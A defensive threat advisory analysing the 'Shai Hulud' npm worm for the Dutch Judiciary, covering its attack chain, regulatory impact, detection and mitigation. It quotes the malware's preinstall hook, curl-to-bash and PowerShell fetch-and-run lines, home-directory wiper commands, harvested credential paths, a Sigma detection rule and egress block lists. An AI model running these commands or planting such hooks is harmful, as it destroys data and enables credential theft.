1. Summary

This advisory constitutes a analysis of the “Shai Hulud” malware campaign, a sophisticated, self-replicating supply chain attack targeting the JavaScript/TypeScript (NPM) ecosystem. This threat poses a critical and active risk to the Dutch public sector’s Continuous Integration/Continuous Deployment (CI/CD) pipelines, particularly within the context of the Judiciary (Rechtspraak), given the extensive reliance on open-source dependencies for digital service delivery and the modernization of judicial applications.

The attack has evolved through two distinct phases: an initial wave in September 2025 targeting widely used libraries such as @ctrl/tinycolor and ngx-bootstrap, and a more aggressive “Second Coming” (v2) observed in late November 2025. This second variant leverages the Bun runtime for evasion, operates during the preinstall phase to maximize infection rates, and includes destructive “wiper” capabilities designed to destroy victim data upon detection or containment attempts. The malware operates as a worm, utilizing stolen NPM publisher tokens to automatically infect downstream dependencies, creating an exponential blast radius that threatens the integrity of the national software supply chain.

Key Findings & Strategic Risks:

Active Threat Status: The campaign is active, adaptive, and evolving. The v2 variant executes during the preinstall phase of package installation. This means infection occurs immediately upon dependency resolution—prior to any build steps, testing, or static analysis that might occur later in the pipeline.1
Destructive Capability (“Dead Man’s Switch”): Analysis confirms a “dead man’s switch.” If the malware fails to authenticate with external command-and-control (C2) or exfiltration endpoints (GitHub/NPM), it executes a destructive payload designed to wipe the user’s home directory ($HOME or %USERPROFILE%). This poses a severe risk to developer workstations and build agents, potentially resulting in catastrophic data loss for unbacked-up local environments.3
Data Exfiltration: The malware aggressively harvests cloud credentials (AWS, Azure, GCP), source code control tokens (GitHub PATs), and registry credentials (NPM tokens). It utilizes an embedded version of the legitimate security tool TruffleHog to scan the filesystem for high-entropy secrets, effectively weaponizing defensive tooling against the victim.5
Sovereignty & Compliance Violation: The exfiltration mechanism publishes stolen data to public GitHub repositories. For the Dutch public sector, this constitutes a significant data breach under the General Data Protection Regulation (AVG) and a “significant incident” under the NIS2 Directive (implemented via the Cyberbeveiligingswet), necessitating immediate reporting to the CSIRT-DSP and NCSC-NL due to the potential compromise of state secrets and citizen data.7
Persistence: The malware establishes persistence by registering infected build agents as self-hosted GitHub Actions runners (often named SHA1HULUD), granting attackers remote code execution capabilities within the internal network, bypassing traditional perimeter firewalls.9

Immediate Recommendations (BLUF):

Block Egress: Immediately block outbound traffic to webhook.site, *.github.io (specifically suspicious subdomains), and restrict egress from CI/CD runners to a strict allow-list.
Audit Dependencies: Scan all package-lock.json and yarn.lock files for the presence of @ctrl/tinycolor (versions 4.1.1/4.1.2), ngx-bootstrap, and other indicators of compromise (IoCs) listed in this report.
Containment Protocol: Isolate any machine showing signs of setup_bun.js or bun_environment.js execution. Do not simply disconnect network cables on developer workstations without preparation, as this may trigger the wiper mechanism; suspend the process or VM state first to freeze execution.
Credential Rotation: Assume compromise of all NPM tokens and GitHub Personal Access Tokens (PATs) present on infected machines. Rotate all cloud credentials exposed to CI environments immediately.

2. Technical Anatomy of the Attack

The “Shai Hulud” campaign represents a paradigm shift in NPM supply chain attacks, moving from simple credential theft (like the event-stream incident) to automated, worm-like propagation with destructive failsafes. The analysis below dissects the kill chain of the v2 variant (“The Second Coming”), which poses the highest current threat to the Judiciary’s infrastructure.

2.1. Infection Vector: The “Preinstall” Shift

Unlike the v1 variant which relied on postinstall scripts, the v2 variant executes during the preinstall lifecycle phase. This is a critical tactical evolution. The preinstall script runs immediately when npm install is executed, often before vulnerability scanners or Software Composition Analysis (SCA) tools have completed their assessment of the dependency tree. This ensures the malware runs even if the installation ultimately fails or is cancelled by the user.1

The infection begins with a compromised dependency (e.g., a trojanized version of @asyncapi/specs, @ctrl/tinycolor, or posthog-node) containing a modified package.json:

JSON

“scripts”: { “preinstall”: “node setup_bun.js”}This triggers the execution of the dropper script, setup_bun.js, which initiates the malware’s bootstrap process. The choice of preinstall is deliberate; it catches developers and CI systems off-guard, executing code the moment they attempt to consume the package.

2.2. The Dropper: setup_bun.js and Bun Runtime Evasion

The attackers have chosen to utilize the Bun runtime environment rather than standard Node.js for the execution of the main payload. This serves as a potent evasion technique. Many Endpoint Detection and Response (EDR) and container security tools are tuned to monitor node, npm, or python processes for suspicious child processes or network connections. However, bun is a newer, faster runtime that may not be on the radar of legacy security monitoring rules, or may be whitelisted as a developer tool.11

Mechanism of setup_bun.js:

Environment Check: The script first checks if the bun binary is already present in the system’s PATH or in standard installation directories.
Silent Installation: If absent, it downloads and installs bun directly from the official domain bun.sh via curl (on Unix-like systems) or powershell (on Windows).
Linux/macOS Command: The script executes a command similar to execSync(‘curl -fsSL https://bun.sh/install | bash’, { stdio: ‘ignore’ }); to fetch the installer and pipe it to bash.
Windows Command: It uses PowerShell: execSync(‘powershell -c “irm bun.sh/install.ps1|iex”‘, { stdio: ‘ignore’ });.
Path Manipulation: It dynamically updates the process’s environment path to include the newly installed Bun binary, ensuring it can be called immediately without a system restart.
Payload Execution: Once the runtime is available, it executes the core malicious payload, bun_environment.js. Crucially, it often launches this as a detached background process. This allows the legitimate npm install process to continue and appear to complete successfully, masking the infection from the developer who sees a “success” message in their terminal.10

2.3. The Core Payload: bun_environment.js

The bun_environment.js file is a large (~10MB), heavily obfuscated JavaScript file containing the malware’s primary logic. It functions as a modular attack framework with distinct capabilities for reconnaissance, harvesting, exfiltration, and destruction. The size and obfuscation are designed to hinder static analysis and reverse engineering.13

2.3.1. Credential Harvesting & “TruffleHog” Abuse

The malware creates a directory structure (often hidden, such as .truffler-cache) and downloads a standalone binary of TruffleHog, a legitimate open-source security tool used for finding secrets. By weaponizing a legitimate security tool, the attackers ensure high-fidelity secret detection while potentially blending in with legitimate DevSecOps activities—a “Living off the Land” (LotL) tactic.5

Targeted Credentials:

Cloud Providers: The malware scans standard configuration paths (~/.aws/credentials, ~/.azure/, ~/.config/gcloud/) and specific environment variables (e.g., AWS_ACCESS_KEY_ID, AZURE_CLIENT_SECRET) for AWS Access Keys, Azure Service Principal secrets, and GCP Service Account keys. It parses these files to extract cleartext credentials.15
Development Tools: It specifically hunts for tokens related to the software supply chain: NPM_TOKEN, GITHUB_TOKEN, GH_TOKEN, and private SSH keys (id_rsa, id_ed25519) used for repository access.5
Filesystem Scan: It executes the embedded TruffleHog binary with arguments to scan the entire filesystem (or specific user directories like $HOME) for high-entropy strings that match patterns for API keys, database passwords, and other secrets. The results are output to a JSON file (e.g., truffleSecrets.json) for exfiltration.6

2.3.2. Worm Propagation Mechanism

This is the defining characteristic of “Shai Hulud.” The malware checks for a valid NPM publishing token in the victim’s .npmrc file or environment variables. If a write-access token is found:

Authentication: It authenticates to the NPM registry as the victim user.10
Enumeration: It queries the registry to list all packages maintained by the compromised user.
Infection: It downloads the latest version of these packages to a temporary directory. It then injects the setup_bun.js and bun_environment.js files into the package structure and modifies package.json to include the malicious preinstall script pointing to the dropper.
Republication: It bumps the package version (typically incrementing the patch level, e.g., 1.0.1 to 1.0.2) to ensure the new malicious version is picked up by users with semver-compatible dependencies (e.g., ^1.0.0). Finally, it publishes the infected package back to the NPM registry.5

This automated self-replication allows the malware to move laterally from a single compromised developer workstation to potentially hundreds of trusted libraries within minutes. In the initial waves, this mechanism was responsible for infecting over 500 packages.5

2.3.3. Persistence via GitHub Actions

To maintain access even if the infected package is removed from the registry or the developer cleans their machine, the malware establishes persistence within the victim’s GitHub repositories:

Self-Hosted Runners: It uses stolen GitHub tokens to register the infected machine as a self-hosted GitHub Actions runner. These runners are often named SHA1HULUD or use a random 18-character string.4 This effectively turns the compromised server into a botnet node controlled by the attacker, allowing them to execute arbitrary jobs on the machine at any time.
Malicious Workflows: It commits malicious workflow files (e.g., .github/workflows/discussion.yaml or shai-hulud-workflow.yml) to the victim’s repositories. These workflows are configured to trigger on common events (like creating a discussion) or on a schedule. When triggered, they execute commands to exfiltrate secrets, run crypto-miners, or reinfect the environment.9

2.4. Destructive Capability: The “Dead Man’s Switch”

Perhaps the most critical finding for incident responders is the malware’s destructive fallback mechanism. Code analysis reveals a conditional logic block that functions as a wiper. This capability transforms the threat from purely espionage to potential sabotage.

Trigger Conditions:

The wiper is triggered if the malware cannot authenticate to GitHub (preventing data exfiltration) AND cannot find a valid NPM token (preventing propagation).4 This behavior suggests a “scorched earth” policy: if the malware determines it has been cornered, analyzed in a sandbox without internet access, or if the victim has revoked credentials but not removed the active malware process, it destroys evidence and inflicts damage.

Destructive Logic:

Linux/macOS: It executes the command shred -uvz -n 1 on files in the home directory. shred overwrites files with random data to prevent forensic recovery before deleting them. It follows this with find “$HOME” -depth -type d -empty -delete to recursively remove empty directories, effectively wiping the user’s profile.3
Windows: It utilizes del /F /Q /S “%USERPROFILE%*” to force-delete files and cipher /W:%USERPROFILE% to overwrite free space, making recovery difficult.3

Operational Implication: This creates a significant risk during containment. Simply severing the network connection of an active infection before suspending the process could trigger this wiper logic, as the malware will interpret the loss of connectivity to GitHub/NPM as a trigger condition.

3. Impact Assessment (Dutch Public Sector Context)

The threat profile for the Dutch Judiciary (Rechtspraak) and the broader public sector is categorized as CRITICAL. The heavy reliance on modern JavaScript frameworks (Angular, React, Vue) and the NPM ecosystem for digital services (e.g., Mijn Rechtspraak, digital filing systems, case management interfaces) creates a broad and fertile attack surface for this campaign.

3.1. Likelihood of Exposure

The likelihood of exposure is High.

Targeted Libraries: The infection of @ctrl/tinycolor (2M+ weekly downloads) and ngx-bootstrap (widely used in Angular applications, which are common in enterprise environments like the Judiciary) means that any CI/CD pipeline pulling the “latest” version of these dependencies during the infection window was likely compromised.5
Transitive Dependencies: Even if these libraries are not direct dependencies of Rechtspraak applications, they are often deeply nested transitively (dependencies of dependencies). Tools like npm audit may not catch the malicious version immediately if the vulnerability database is not updated in real-time, or if the malicious package mimics a legitimate update.
Public vs. Private Registries: Organizations using direct connections to registry.npmjs.org are at immediate risk. Those using caching proxies (Artifactory/Nexus) are still at risk if the proxy updated its cache during the infection window. Unless strict “quarantine” policies are in place, the proxy would simply cache and serve the malicious artifact.20

3.2. Data Exfiltration Risks

The specific risk to the Judiciary involves the exfiltration of high-sensitivity technical secrets, which can lead to secondary compromises and lateral movement:

Cloud Keys: Exfiltration of AWS Access Keys or Azure Service Principal credentials allows attackers to access cloud storage buckets (S3, Blob Storage) potentially containing sensitive case data, Personally Identifiable Information (PII) of citizens, or system backups.10
Source Code Access: Stolen GitHub Personal Access Tokens (PATs) grant attackers read/write access to private repositories. This exposes intellectual property, the internal logic of judicial systems, and potentially hardcoded secrets within the code.5 Access to source code facilitates the discovery of further vulnerabilities.
Infrastructure-as-Code (IaC): Access to Terraform or Kubernetes configurations via stolen secrets can allow attackers to map the internal network, understand the security architecture, and deploy backdoors at the infrastructure level (e.g., modifying a Terraform plan to open a security group).

3.3. “Wormable” Propagation within Internal Registries

A unique and dangerous vector is the potential for the worm to infect private/internal packages. If a developer with write access to the organization’s private NPM registry (e.g., an internal Artifactory instance hosted within the Rechtspraak network) is infected, the malware will attempt to publish infected versions of internal packages.15

This would effectively poison the internal supply chain. The malware would then spread to every other internal project that consumes these private libraries, bypassing perimeter defenses and moving laterally across development teams. This “insider threat” mechanic turns trusted developers into unwitting vectors of infection.

4. NIS2 Compliance & Regulatory Impact

Under the NIS2 Directive (EU 2022/2555), transposed into Dutch law via the Cyberbeveiligingswet, the Judiciary and associated digital service providers are classified as essential or important entities. This classification imposes strict legal obligations regarding supply chain security and incident reporting.

4.1. “Significant Incident” Determination

A successful infection by Shai Hulud constitutes a “significant incident” under NIS2 and the Wbni (Wet beveiliging netwerk- en informatiesystemen) based on the following criteria:

Severe Operational Disruption: The potential for the wiper payload to destroy developer machines and build agents represents a severe disruption to the software supply chain and maintenance capabilities. If widespread, this could halt the ability to release critical security patches for judicial applications.21
Confidentiality Breach: The exfiltration of credentials and potential access to private repositories constitutes a breach of confidentiality that can affect the security of network and information systems. The theft of cloud keys could lead to unauthorized access to sensitive citizen data.7
Cross-Border Impact: Since the malware publishes stolen secrets to public GitHub repositories and potentially infects packages used globally (if the organization publishes open source software), the incident has an inherent cross-border dimension.23

4.2. Reporting Obligations (NCSC-NL & CSIRT-DSP)

Upon detection of a Shai Hulud infection, the organization is legally obligated to adhere to the strict reporting timelines mandated by NIS2 8:

Early Warning (24 Hours): An early warning must be submitted to the NCSC-NL (National Cyber Security Centre) and/or the CSIRT-DSP (for digital service providers) within 24 hours of becoming aware of the significant incident. This report must indicate whether the incident is suspected to be caused by unlawful or malicious action (which, in this case, is affirmative).
Incident Notification (72 Hours): A detailed incident notification must be submitted within 72 hours. This must include an initial assessment of the severity, impact, and indicators of compromise (IoCs).
Final Report (1 Month): A comprehensive final report must be submitted no later than one month after the incident notification. This report must detail the root cause, applied mitigation measures, and cross-border impact analysis.

4.3. BIO v1.2 Alignment (Baseline Informatiebeveiliging Overheid)

The incident highlights critical gaps in compliance with BIO v1.2 controls regarding software development and supply chain security.25 The BIO is the mandatory baseline for Dutch government information security.

Control 14.2.5 (Secure System Engineering): This control requires that principles for secure system engineering be established, documented, maintained, and applied to any information system implementation efforts. Reliance on unpinned, unverified public dependencies without integrity checks violates the spirit of this control.
Control 14.2.1 (Secure Development Policy): Mandates rules for the development of software and systems. The “preinstall” execution vector specifically circumvents standard integrity checks that should be part of a secure development policy.
Control 15.1.1 (Information Security Policy for Supplier Relationships): Requires information security requirements for mitigating the risks associated with supplier’s access to the organization’s assets. In this context, the “supplier” is the open-source maintainer. The implicit trust placed in these maintainers without verification represents a failure of this control.

5. Detection & Threat Hunting Strategy

To detect active or past infections, the SOC must execute a coordinated threat hunting campaign across endpoints (developer workstations) and CI/CD infrastructure. The following strategies leverage the indicators identified in the technical analysis.

5.1. Log & Network Analysis Queries

Query 1: Outbound Traffic to Exfiltration Domains

The malware exfiltrates data to specific endpoints. Block and alert on traffic to the following domains. Note that webhook.site is a legitimate service often used for testing, but its presence in CI logs is highly suspicious.

webhook.site (Commonly used by v1/v2 for exfiltration).17
*.github.io (Used for staging payloads or hosting configuration files).
bun.sh (If bun is not a standard approved tool in the environment, download attempts here are a high-fidelity indicator).13

Query 2: Suspicious Process Execution (EDR/Sigma)

Look for the execution of the installation script, the dynamic installation of Bun, or the hidden TruffleHog binary.

YAML

Sigma Logic for Detection (Conceptual)detection: selection_dropper: CommandLine|contains: – ‘node setup_bun.js’ – ‘curl -fsSL https://bun.sh/install’ – ‘irm bun.sh/install.ps1’ selection_trufflehog: CommandLine|contains: – ’trufflehog filesystem’ – ’trufflehog –json’ – ’trufflehog filesystem /’ selection_wiper: CommandLine|contains: – ‘shred -uvz’ – ‘cipher /W:%USERPROFILE%’ condition: selection_dropper or selection_trufflehog or selection_wiper3

Query 3: GitHub Actions Anomaly Detection

Scan GitHub audit logs for specific anomalies related to the persistence mechanism:

Runner Registration: Registration of new self-hosted runners with names containing SHA1HULUD or random 18-character strings.9
Repository Creation: Creation of public repositories with descriptions matching “Shai-Hulud” or “Sha1-Hulud: The Second Coming”.10
Workflow Modification: Workflows created/modified with filenames like discussion.yaml, shai-hulud-workflow.yml, or formatter_123456789.yml.30

5.2. File System Indicators (IoCs)

Presence of any of the following files on a developer machine or build agent indicates a compromise:

Dropper: setup_bun.js.20
Payload: bun_environment.js.2
Staging Files: truffleSecrets.json, cloud.json, environment.json, contents.json (Exfiltration staging files often found in temp directories or workspace roots).2
Hidden Directory: A hidden .bun directory in the user’s home folder (if Bun is not authorized or installed by the user).18

5.3. Identifying “Trojanized” Internal Packages

To determine if internal packages (@rechtspraak/*) have been compromised and republished to the internal registry:

Audit Registry Logs: Check internal registry (Artifactory/Nexus) logs for package publication events (npm publish) originating from IP addresses associated with compromised developer machines or occurring at anomalous times (e.g., late at night).
Compare Checksums: Compare the checksums (shasum) of internal packages in the registry against the known good builds generated by the CI/CD system. Any discrepancy indicates tampering.
Scan for Scripts: Download the tarballs of recently published internal packages and scan package.json for the presence of preinstall scripts executing setup_bun.js. Legitimate internal packages should rarely, if ever, require such scripts for deployment.

6. Mitigation & Hardening Roadmap

This section outlines the immediate steps to sanitize the environment and the strategic measures to harden the supply chain against future wormable attacks.

6.1. Immediate Containment (The “Anti-Wiper” Protocol)

CRITICAL WARNING: Due to the “dead man’s switch” (wiper), simply disconnecting a machine from the internet may trigger the destructive payload if the malware is active and detects the loss of connectivity to GitHub/NPM.

Suspend, Don’t Kill: If a machine is suspected of active infection, use EDR capabilities to suspend all node, bun, and powershell processes immediately rather than killing them or severing the network connection abruptly. Suspending the process freezes the execution state, preventing the wiper logic from running.
Forensic Snapshot: Once suspended, take a memory and disk snapshot for forensic analysis and potential data recovery. This preserves evidence for NIS2 reporting.
Isolation: After processes are suspended, isolate the machine from the network (VLAN quarantine).
Sanitization: Reimaging is the only safe remediation. Do not attempt to “clean” the malware. The malware establishes multiple persistence mechanisms and potentially modifies other files. Rebuild developer workstations and CI runners from known-good, immutable images.13

6.2. Short-Term Remediation (24-48 Hours)

Credential Revocation & Rotation:
NPM Tokens: Revoke all Granular and Classic NPM tokens immediately. Implement a policy of “least privilege” for new tokens.2
GitHub PATs: Revoke all PATs. Check for unauthorized SSH keys added to GitHub accounts.
Cloud Keys: Rotate all AWS Access Keys, Azure Service Principals, and GCP Service Account keys exposed to CI/CD environments or found on infected developer machines.
Dependency Pinning:
Enforce the use of npm ci instead of npm install in all CI/CD pipelines. npm ci strictly installs versions from package-lock.json and prevents the silent installation of newer, potentially malicious versions.32
Run npm audit across all repositories and purge local and CI caches: npm cache clean –force.2
Repository Cleanup:
Scan all repositories for malicious workflow files (e.g., .github/workflows/discussion.yaml).
Check for and remove unauthorized self-hosted runners in GitHub Organization settings.

6.3. Strategic Hardening (Sovereign & Resilient Architecture)

To align with the “Data Platform as Product” and “Sovereign Cloud” goals found in the workspace research, the following architectural changes are recommended to prevent future recurrence.

6.3.1. Isolate Build Environments & Private Registries

Strict Upstream Proxy: Configure Artifactory/Nexus to block direct access to npmjs.org for all developers and build agents. All packages must be proxied through the internal registry.
Quarantine Policy: Implement a “quarantine” policy where new package versions are held for 24-48 hours before being made available to developers. This allows time for community security reports to emerge and for vulnerability databases to update, reducing the risk of Zero-Day supply chain attacks.33
Scoped Registries: Configure .npmrc to strictly define scopes. Ensure internal packages (@rechtspraak/*) can only be pulled from the private registry, preventing “Dependency Confusion” attacks where attackers register internal package names on the public registry.

6.3.2. Implement OIDC for Publishing

Eliminate long-lived NPM tokens entirely. Adopt OpenID Connect (OIDC) for trusted publishing.

Configure GitHub Actions to authenticate with the NPM registry using OIDC tokens. These tokens are short-lived, ephemeral, and bound to the specific workflow run. This renders stolen tokens useless outside the specific CI context, neutralizing the “worm” propagation vector.31

6.3.3. Harden CI/CD Runners

Ephemeral Runners: Move to ephemeral (stateless) build agents that are destroyed after every job. This prevents the malware from establishing persistence or using the runner as a long-term beachhead.35
Network Segmentation: Restrict outbound internet access for CI runners. Whitelist only necessary domains (e.g., registry.npmjs.org (proxied), github.com). Explicitly block unknown Top-Level Domains (TLDs) and dynamic DNS domains like webhook.site.26

6.3.4. Software Bill of Materials (SBOM) Enforcement

Implement automated SBOM generation (using tools like Syft or CycloneDX) for every build. Ingest these SBOMs into a dependency track system (e.g., OWASP Dependency-Track) to continuously monitor for the introduction of malicious packages like @ctrl/tinycolor across the entire application portfolio. This provides visibility into “phantom dependencies” that may not appear in the root package.json.36

7. Conclusion

The Shai Hulud campaign demonstrates that the NPM ecosystem is being weaponized with increasing sophistication, moving from simple theft to automated destruction. For the Dutch Judiciary, the combination of data exfiltration and destructive capabilities necessitates a shift from reactive patching to proactive supply chain defense. By implementing strict egress controls, adopting OIDC for identity-based access, and adhering to the NIS2 reporting framework, the organization can contain this threat and build resilience against the next generation of supply chain worms. The immediate priority is the safe containment of any infected nodes to prevent data destruction, followed by a rigorous audit of credentials and dependencies.

Appendix A: IoC Database

The following indicators of compromise are associated with the Shai Hulud v2 campaign.

Indicator TypeValue / PatternDescription****File Hash (SHA256)a3894003ad1d293ba96d77881ccd2071446dc3f65f434669b49b3da92421901asetup_bun.js (Dropper)File Hash (SHA1)d60ec97eea19fffb4809bc35b91033b52490ca11bun_environment.js (Payload)File Namesetup_bun.js, bun_environment.jsMalicious scripts found in package rootFile NametruffleSecrets.json, cloud.json, environment.json, contents.jsonStaging files for exfiltrated dataNetwork Domainwebhook.siteC2 / Exfiltration EndpointNetwork Domainbun.shUnauthorized download of Bun runtimeGitHub RepoDescription: “Sha1-Hulud: The Second Coming”Repositories created by malwareGitHub RunnerName: SHA1HULUDMalicious self-hosted runnerPackage Name@ctrl/tinycolorVersions 4.1.1, 4.1.2 (Compromised)Package Namengx-bootstrapCompromised versions (check specific advisories)Package Name@asyncapi/specsCompromised versions (check specific advisories)

Geciteerd werk

Shai-hulud 2.0 Campaign Targets Cloud and Developer Ecosystems | Trend Micro (US), geopend op november 28, 2025, https://www.trendmicro.com/en_us/research/25/k/shai-hulud-2-0-targets-cloud-and-developer-systems.html
Shai-Hulud 2.0 Supply Chain Attack: 25K+ Repos Exposing Secrets – Wiz, geopend op november 28, 2025, https://www.wiz.io/blog/shai-hulud-2-0-ongoing-supply-chain-attack
GitLab discovers widespread npm supply chain attack, geopend op november 28, 2025, https://about.gitlab.com/blog/gitlab-discovers-widespread-npm-supply-chain-attack/
Second Sha1-Hulud Wave Affects 25,000+ Repositories via npm Preinstall Credential Theft, geopend op november 28, 2025, https://thehackernews.com/2025/11/second-sha1-hulud-wave-affects-25000.html
Shai-Hulud worm infects npm packages – Securelist, geopend op november 28, 2025, https://securelist.com/shai-hulud-worm-infects-500-npm-packages-in-a-supply-chain-attack/117547/
Shai-Hulud: Self-Replicating Worm Compromises 500+ NPM Packages – StepSecurity, geopend op november 28, 2025, https://www.stepsecurity.io/blog/ctrl-tinycolor-and-40-npm-packages-compromised
Computer Security Incident Response Teams in the reformed Network and Information Security Directive: good practices, geopend op november 28, 2025, https://www.ncsc.nl/binaries/ncsc/documenten/publicaties/2022/oktober/13/index/NCSC_NIS2_D1_Final.pdf
Report an incident | Contact | National Cyber Security Centre, geopend op november 28, 2025, https://english.ncsc.nl/contact/contact-forms/incident-registration
The Second Coming of Shai-Hulud: npm Targeted Yet Again – Orca Security, geopend op november 28, 2025, https://orca.security/resources/blog/shai-hulud-npm-malware-wave-2/
“Shai-Hulud” Worm Compromises npm Ecosystem in Supply Chain Attack (Updated November 26) – Unit 42, geopend op november 28, 2025, https://unit42.paloaltonetworks.com/npm-supply-chain-attack/
Return of the Shai-Hulud worm affects over 25,000 GitHub repositories – Sysdig, geopend op november 28, 2025, https://www.sysdig.com/blog/return-of-the-shai-hulud-worm-affects-over-25-000-github-repositories
Shai-Hulud 2 Malware Campaign Targets GitHub and Cloud Credentials Using Bun Runtime | Blog | Endor Labs, geopend op november 28, 2025, https://www.endorlabs.com/learn/shai-hulud-2-malware-campaign-targets-github-and-cloud-credentials-using-bun-runtime
Sha1-Hulud: The Second Coming – Zapier, ENS Domains, and Other Prominent NPM Packages Compromised – StepSecurity, geopend op november 28, 2025, https://www.stepsecurity.io/blog/sha1-hulud-the-second-coming-zapier-ens-domains-and-other-prominent-npm-packages-compromised
The Shai-Hulud 2.0 npm worm: analysis, and what you need to know, geopend op november 28, 2025, https://securitylabs.datadoghq.com/articles/shai-hulud-2.0-npm-worm/
Shai-Hulud 2.0: Aggressive & Automated, One Of Fastest Spreading NPM Supply Chain Attacks Ever Observed – Netskope, geopend op november 28, 2025, https://www.netskope.com/blog/shai-hulud-2-0-aggressive-automated-one-of-fastest-spreading-npm-supply-chain-attacks-ever-observed
Shai-hulud 2.0 Campaign Targets Cloud and Developer Ecosystems, geopend op november 28, 2025, https://www.trendmicro.com/pt_br/research/25/k/shai-hulud-2-0-targets-cloud-and-developer-systems.html
Responding to npm package compromise by the Shai-Hulud worm. – Kaspersky, geopend op november 28, 2025, https://www.kaspersky.com/blog/tinycolor-shai-hulud-supply-chain-attack/54315/
Shai-Hulud, The Second Coming – Ongoing npm supply chain attack – JFrog Security Research, geopend op november 28, 2025, https://research.jfrog.com/post/shai-hulud-the-second-coming/
Shai-Hulud npm supply chain attack: What you need to know | ReversingLabs, geopend op november 28, 2025, https://www.reversinglabs.com/blog/shai-hulud-worm-npm
Shai-Hulud 2.0: How Cortex Detects and Blocks the Resurgent npm Worm – Palo Alto Networks Blog, geopend op november 28, 2025, https://www.paloaltonetworks.com/blog/cloud-security/shai-hulud-2-0-npm-worm-detection-blocking/
The relationship between the mandatory reporting obligations of NIS2 and GDPR in light of premature public disclosure – http, geopend op november 28, 2025, http://arno.uvt.nl/show.cgi?fid=163379
The NIS2 directive – Deloitte, geopend op november 28, 2025, https://www.deloitte.com/nl/en/services/consulting-risk/perspectives/the-nis2-directive.html
NIS2 Directive Compliance Guide: Essential Requirements 2025 – ATLAS Advisory, geopend op november 28, 2025, https://atlas-advisory.eu/insights/nis2-directive-compliance-guide
What is NIS2? Everything Your Business Needs to Know – NISTRA, geopend op november 28, 2025, https://getnistra.com/what-is-nis2-everything-your-business-needs-to-know/
Baseline information security for government 2, BIO2 – bio-overheid, geopend op november 28, 2025, https://www.bio-overheid.nl/media/jcdfql4p/20250924-baseline-information-security-for-government-2-bio2-v12-final.pdf
Widespread Supply Chain Compromise Impacting npm Ecosystem – CISA, geopend op november 28, 2025, https://www.cisa.gov/news-events/alerts/2025/09/23/widespread-supply-chain-compromise-impacting-npm-ecosystem
Shai-Hulud 2.0 Deep Dive and Actionable Steps You Should Take | Cycode, geopend op november 28, 2025, https://cycode.com/blog/shai-hulud-2-0-deep-dive-and-actionable-steps-you-should-take/
Navigating the Shai-Hulud worm: Elastic’s proactive defense against npm supply chain compromise, geopend op november 28, 2025, https://www.elastic.co/blog/shai-hulud-worm-npm-supply-chain-compromise
Shai Hulud 2.0 Strikes Again: Malware Supply-Chain Attack Hits Zapier & ENS Domains, geopend op november 28, 2025, https://www.aikido.dev/blog/shai-hulud-strikes-again-hitting-zapier-ensdomains
CONTAIN, ROTATE, RECOVER: The 5-Phase Shai-Hulud Response Guide, geopend op november 28, 2025, https://research.jfrog.com/post/shai-hulud-the-second-coming-remediation-guidance/
Strengthening npm security: Important changes to authentication and token management, geopend op november 28, 2025, https://github.blog/changelog/2025-09-29-strengthening-npm-security-important-changes-to-authentication-and-token-management/
Security Insights – DevCentral – F5, geopend op november 28, 2025, https://community.f5.com/category/articles/kb/security-insights
Sandworm in the supply chain: Lessons from the Shai-Hulud npm attack on developer and machine identities – CyberArk, geopend op november 28, 2025, https://www.cyberark.com/resources/blog/sandworm-in-the-supply-chain-lessons-from-the-shai-hulud-npm-attack-on-developer-and-machine-identities
OpenID Connect – GitHub Docs, geopend op november 28, 2025, https://docs.github.com/en/actions/concepts/security/openid-connect
Security Lessons For All From GitHub’s Hardened Package Publication For npm, geopend op november 28, 2025, https://blog.gitguardian.com/security-lessons-npm-publishing/
When the Shai-Hulud Worm Awakens: Tinycolor’s Fall and the New Era of Supply Chain Risk – Black Kite, geopend op november 28, 2025, https://blackkite.com/blog/when-the-shai-hulud-worm-awakens-tinycolors-fall-and-the-new-era-of-supply-chain-risk
Data Platform as Product, https://drive.google.com/open?id=1uGxC5f5AYCxwbjW9kFHt5ubnbIR4hjxXozIdltoDySg
shai-hulud-2-packages.csv – wiz-sec-public/wiz-research-iocs – GitHub, geopend op november 28, 2025, https://github.com/wiz-sec-public/wiz-research-iocs/blob/main/reports/shai-hulud-2-packages.csv

Containment analysis, and mitigation of the “Shai Hulud” supply chain malware campaign